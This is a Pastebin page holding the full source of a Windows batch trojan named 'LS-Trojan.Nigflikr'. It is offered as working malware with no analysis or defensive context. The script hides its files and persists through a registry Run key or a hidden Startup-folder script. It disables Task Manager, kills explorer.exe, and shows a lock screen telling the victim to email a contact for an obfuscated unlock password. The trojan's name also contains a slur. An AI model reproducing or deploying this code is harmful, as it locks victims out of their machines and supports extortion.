Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- @echo off
- title LS-Trojan.Nigflikr.bat
- :: THESE KEEP THE FILES FROM MESSING UP INCASE THE USER RUNS THE PROGRAM MORE THAN ONCE.
- :: IF FILES EXIST UNHIDE THEM
- if exist "%TEMP%\nigflikr\Password.jchfkjdh" attrib "%TEMP%\nigflikr\Password.jchfkjdh" -s -h
- if exist "%TEMP%\nigflikr\Key.fgjodrijg" attrib "%TEMP%\nigflikr\Key.fgjodrijg" -s -h
- if exist "%TEMP%\nigflikr\lock.bat" attrib "%TEMP%\nigflikr\lock.bat" -s -h
- :: IF FILES EXIST DELETE THEM TO PREVENT ERRORS
- if exist "%TEMP%\nigflikr\Password.jchfkjdh" del "%TEMP%\nigflikr\Password.jchfkjdh"
- if exist "%TEMP%\nigflikr\Key.fgjodrijg" del "%TEMP%\nigflikr\Key.fgjodrijg"
- if exist "%TEMP%\nigflikr\lock.bat" del "%TEMP%\nigflikr\lock.bat"
- :: IF FOLDER DOES NOT EXIST, PUT IT THERE
- if not exist "%TEMP%\nigflikr\" mkdir "%TEMP%\nigflikr\"
- :: ENCRYPTED PASSWORD.
- echo -2533-2831-2086-5066-2086-2384-4172-2831-1788-4619-2831-5066-2086-1788-1639 > "%TEMP%\nigflikr\Password.jchfkjdh"
- :: KEY CODE FOR DECRYPTION.
- echo 149 > "%TEMP%\nigflikr\Key.fgjodrijg"
- :: HIDE FILES.
- attrib "%TEMP%\nigflikr\Password.jchfkjdh" +s +h
- attrib "%TEMP%\nigflikr\Key.fgjodrijg" +s +h
- :: CHECK IF THE USER HAS GIVEN ADMIN RIGHTS.
- net session >nul 2>&1
- if %errorLevel% == 0 (
- :: IF THE USER DOES HAVE ADMIN RIGHTS DO THIS.
- :: REGISTRY START & DISABLE TASK MANGER.
- reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Nigflikr" /t REG_SZ /F /D "%TEMP%\nigflikr\lock.bat"
- :: DISABLE TASK MANAGER WITH NO PROMPT.
- reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 00000001
- ) else (
- :: IF THE USER DOES NOT HAVE ADMIN RIGHTS DO THIS.
- :: STARTUP BACKUP INCASE NO ADMIN.
- if exist "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\StartUp.bat" attrib "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\StartUp.bat" -s -h
- if exist "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\StartUp.bat" del "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\StartUp.bat"
- echo @echo off > "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\StartUp.bat"
- echo call "%%TEMP%%\nigflikr\lock.bat" >> "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\StartUp.bat"
- echo exit >> "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\StartUp.bat"
- :: HIDE STARTUP FILE
- attrib "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\StartUp.bat" +s +h
- )
- :: LOCK SCREEN, DECRYPTS PASSWORD.
- echo @echo off > "%TEMP%\nigflikr\lock.bat"
- echo mode con: cols=80 lines=45 >> "%TEMP%\nigflikr\lock.bat"
- echo setlocal EnableDelayedExpansion >> "%TEMP%\nigflikr\lock.bat"
- echo title WARNING^^^^! YOUR COMPUTER IS INFECTED WITH A DANGEROUS VIRUS^^^^! >> "%TEMP%\nigflikr\lock.bat"
- echo color 0c >> "%TEMP%\nigflikr\lock.bat"
- echo for /f "Delims=" %%%%A in (%%TEMP%%\nigflikr\Password.jchfkjdh) do set CHECKPASSWORD=%%%%A >> "%TEMP%\nigflikr\lock.bat"
- echo for /f "Delims=" %%%%B in (%%TEMP%%\nigflikr\Key.fgjodrijg) do set CHECKKEY=%%%%B >> "%TEMP%\nigflikr\lock.bat"
- echo set CHAR=0123456789bhfcjrwmudaxopvntzlqeisykg >> "%TEMP%\nigflikr\lock.bat"
- echo for /l %%%%C in (10 1 36) do ( >> "%TEMP%\nigflikr\lock.bat"
- echo for /f %%%%D in ("!CHAR:~%%%%C,1!") do ( >> "%TEMP%\nigflikr\lock.bat"
- echo set /a MATH=%%%%C*%%CHECKKEY%% >> "%TEMP%\nigflikr\lock.bat"
- echo for /f %%%%E in ("!MATH!") do ( >> "%TEMP%\nigflikr\lock.bat"
- echo set "CHECKPASSWORD=!CHECKPASSWORD:%%%%E=%%%%D!" >> "%TEMP%\nigflikr\lock.bat"
- echo ) >> "%TEMP%\nigflikr\lock.bat"
- echo ) >> "%TEMP%\nigflikr\lock.bat"
- echo ) >> "%TEMP%\nigflikr\lock.bat"
- echo for /f %%%%F in ("!CHECKPASSWORD!") do ( >> "%TEMP%\nigflikr\lock.bat"
- echo set "CHECKPASSWORD=!CHECKPASSWORD:-=!" >> "%TEMP%\nigflikr\lock.bat"
- echo ) >> "%TEMP%\nigflikr\lock.bat"
- echo setlocal DisableDelayedExpansion >> "%TEMP%\nigflikr\lock.bat"
- :: LOCKS SCREEN, FORCES LOOP AND DEMANDS FOR PASSWORD.
- echo taskkill /f /IM explorer.exe >> "%TEMP%\nigflikr\lock.bat"
- echo timeout /t 1 /nobreak ^> nul >> "%TEMP%\nigflikr\lock.bat"
- echo cls >> "%TEMP%\nigflikr\lock.bat"
- echo :Incorrect >> "%TEMP%\nigflikr\lock.bat"
- echo cls >> "%TEMP%\nigflikr\lock.bat"
- :: PROMPT (WITH OPTIONAL ASCII ART)
- echo echo. >> "%TEMP%\nigflikr\lock.bat"
- echo echo `:+shmNMMMMNdhys+:` >> "%TEMP%\nigflikr\lock.bat"
- echo echo :sdMMMMMMMMMMMMMMMMMMNd+` >> "%TEMP%\nigflikr\lock.bat"
- echo echo /hNMMMMMMMMMMMMMMMMMMMMMMMMN/ >> "%TEMP%\nigflikr\lock.bat"
- echo echo `hMMMMMMMMMMMMMMMMMMMMMMMMMMMMMy` >> "%TEMP%\nigflikr\lock.bat"
- echo echo yMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMd. >> "%TEMP%\nigflikr\lock.bat"
- echo echo +MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMd >> "%TEMP%\nigflikr\lock.bat"
- echo echo mMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM- >> "%TEMP%\nigflikr\lock.bat"
- echo echo `MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM/ >> "%TEMP%\nigflikr\lock.bat"
- echo echo NMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMo >> "%TEMP%\nigflikr\lock.bat"
- echo echo sMMMMMmdhyhhdmNMMMMMMMMMmmmNMMMMMMMo >> "%TEMP%\nigflikr\lock.bat"
- echo echo .mMMMm.` ```.sMMMMmy+-.``.-:mMMMm. >> "%TEMP%\nigflikr\lock.bat"
- echo echo :NMMM: -NMMMs dMMm- >> "%TEMP%\nigflikr\lock.bat"
- echo echo /NMMy`.. /NMo:dNs- `-mMN- >> "%TEMP%\nigflikr\lock.bat"
- echo echo /MMNmmmdyhdNN+`+ NNyNNho+oydNMM >> "%TEMP%\nigflikr\lock.bat"
- echo echo .MMMMMMMMMMMs + `oMMMMMMMMMMy >> "%TEMP%\nigflikr\lock.bat"
- echo echo :MMMMMMMMMMMh//N\\hMMMMMMMMMMm` >> "%TEMP%\nigflikr\lock.bat"
- echo echo `+yo+sdMMMMMMMMMMMMMMMMNmmmdh: >> "%TEMP%\nigflikr\lock.bat"
- echo echo .-.mNMNNMMMMMMMMMNh::..` >> "%TEMP%\nigflikr\lock.bat"
- echo echo -m`:+modMNMMMNdMs-`oh >> "%TEMP%\nigflikr\lock.bat"
- echo echo m/:`-`:+:dsyh`/--/Mo >> "%TEMP%\nigflikr\lock.bat"
- echo echo `..` `mdh/dso+`+-.o/s:hMM/ >> "%TEMP%\nigflikr\lock.bat"
- echo echo sNNh/` `yNMMMMMMdMNdMMMNMMMo .-.` >> "%TEMP%\nigflikr\lock.bat"
- echo echo `mMMMMd:` :hNMMMMMMMMMMMMNd+` :NMNy` >> "%TEMP%\nigflikr\lock.bat"
- echo echo hMMMMMMMh/.` -+hmNMMMMNdy+- .:dMMMMdyo` >> "%TEMP%\nigflikr\lock.bat"
- echo echo dMMMMNNMMMNds:.` `-/oo/. `.-+ymMMMMMMMMM: >> "%TEMP%\nigflikr\lock.bat"
- echo echo `/++/:::/sdNMMNho:` `./shmMMMNdyo/osyy+` >> "%TEMP%\nigflikr\lock.bat"
- echo echo .:sdNMMmh+--+ydNMMMNmy/. >> "%TEMP%\nigflikr\lock.bat"
- echo echo -+dMMMMMMMMMmy+-` >> "%TEMP%\nigflikr\lock.bat"
- echo echo `-+ydMMMNNMMMMds:` >> "%TEMP%\nigflikr\lock.bat"
- echo echo `.:ohmMMMNds+-./sdNMMMNh+-` >> "%TEMP%\nigflikr\lock.bat"
- echo echo `-+ydNMMNmy+-` .:ohNMMMmy+-`````` >> "%TEMP%\nigflikr\lock.bat"
- echo echo `-/oydNMMMNho:. `-odNMMMMNmmmm+ >> "%TEMP%\nigflikr\lock.bat"
- echo echo hNMMMMMMh+- .+ymMMMMMMo >> "%TEMP%\nigflikr\lock.bat"
- echo echo -hMMMMM/ `NMMMM+ >> "%TEMP%\nigflikr\lock.bat"
- echo echo +NMm: /NMMo >> "%TEMP%\nigflikr\lock.bat"
- echo echo. >> "%TEMP%\nigflikr\lock.bat"
- echo echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» >> "%TEMP%\nigflikr\lock.bat"
- echo echo º !!!! Your computer is infected with the LS-Trojan.Nigflikr Virus !!!! º >> "%TEMP%\nigflikr\lock.bat"
- echo echo º A password is required to unlock the computer. To Obtain the password º >> "%TEMP%\nigflikr\lock.bat"
- echo echo º !!!! email "[email protected]" PASSWORD IS ENCRYPTED !!!! º >> "%TEMP%\nigflikr\lock.bat"
- echo echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ >> "%TEMP%\nigflikr\lock.bat"
- echo echo. >> "%TEMP%\nigflikr\lock.bat"
- echo set /p "PASSWORD= Enter Password : " >> "%TEMP%\nigflikr\lock.bat"
- echo if /i %%PASSWORD%%==%%CHECKPASSWORD%% color 0a ^& cls ^& echo Password Correct! ^& pause ^& goto Correct >> "%TEMP%\nigflikr\lock.bat"
- echo if /i not %%PASSWORD%%==%%CHECKPASSWORD%% cls ^& echo Password Incorrect! ^& pause ^& goto Incorrect >> "%TEMP%\nigflikr\lock.bat"
- echo :Correct >> "%TEMP%\nigflikr\lock.bat"
- ::THIS REMOVES THE TROJAN IF THE PASSWORD IS CORRECT.
- :: UNHIDE SCREEN
- echo start explorer.exe >> "%TEMP%\nigflikr\lock.bat"
- echo timeout /t 1 /nobreak ^> nul >> "%TEMP%\nigflikr\lock.bat"
- :: UNHIDE FILES
- echo if exist "%%TEMP%%\nigflikr\Password.jchfkjdh" attrib "%%TEMP%%\nigflikr\Password.jchfkjdh" -s -h >> "%TEMP%\nigflikr\lock.bat"
- echo if exist "%%TEMP%%\nigflikr\Key.fgjodrijg" attrib "%%TEMP%%\nigflikr\Key.fgjodrijg" -s -h >> "%TEMP%\nigflikr\lock.bat"
- echo if exist "%%APPDATA%%\Microsoft\Windows\Start Menu\Programs\Startup\StartUp.bat" attrib "%%APPDATA%%\Microsoft\Windows\Start Menu\Programs\Startup\StartUp.bat" -s -h >> "%TEMP%\nigflikr\lock.bat"
- echo if exist "%%~f0" attrib "%%~f0" -s -h >> "%TEMP%\nigflikr\lock.bat"
- :: DELETE FILES IF PASSWORD IS CORRECT.
- echo if exist "%%TEMP%%\nigflikr\Password.jchfkjdh" del "%%TEMP%%\nigflikr\Password.jchfkjdh" >> "%TEMP%\nigflikr\lock.bat"
- echo if exist "%%TEMP%%\nigflikr\Key.fgjodrijg" del "%%TEMP%%\nigflikr\Key.fgjodrijg" >> "%TEMP%\nigflikr\lock.bat"
- echo if exist "%%APPDATA%%\Microsoft\Windows\Start Menu\Programs\Startup\StartUp.bat" del "%%APPDATA%%\Microsoft\Windows\Start Menu\Programs\Startup\StartUp.bat" >> "%TEMP%\nigflikr\lock.bat"
- echo start /b "" cmd /c del "%%~f0" ^& exit /b >> "%TEMP%\nigflikr\lock.bat"
- echo exit >> "%TEMP%\nigflikr\lock.bat"
- REM HIDES THE SCREEN LOCK FILE THEN RUNS IT.
- attrib "%TEMP%\nigflikr\lock.bat" +s +h
- call "%TEMP%\nigflikr\lock.bat"
Advertisement
Add Comment
Please, Sign In to add comment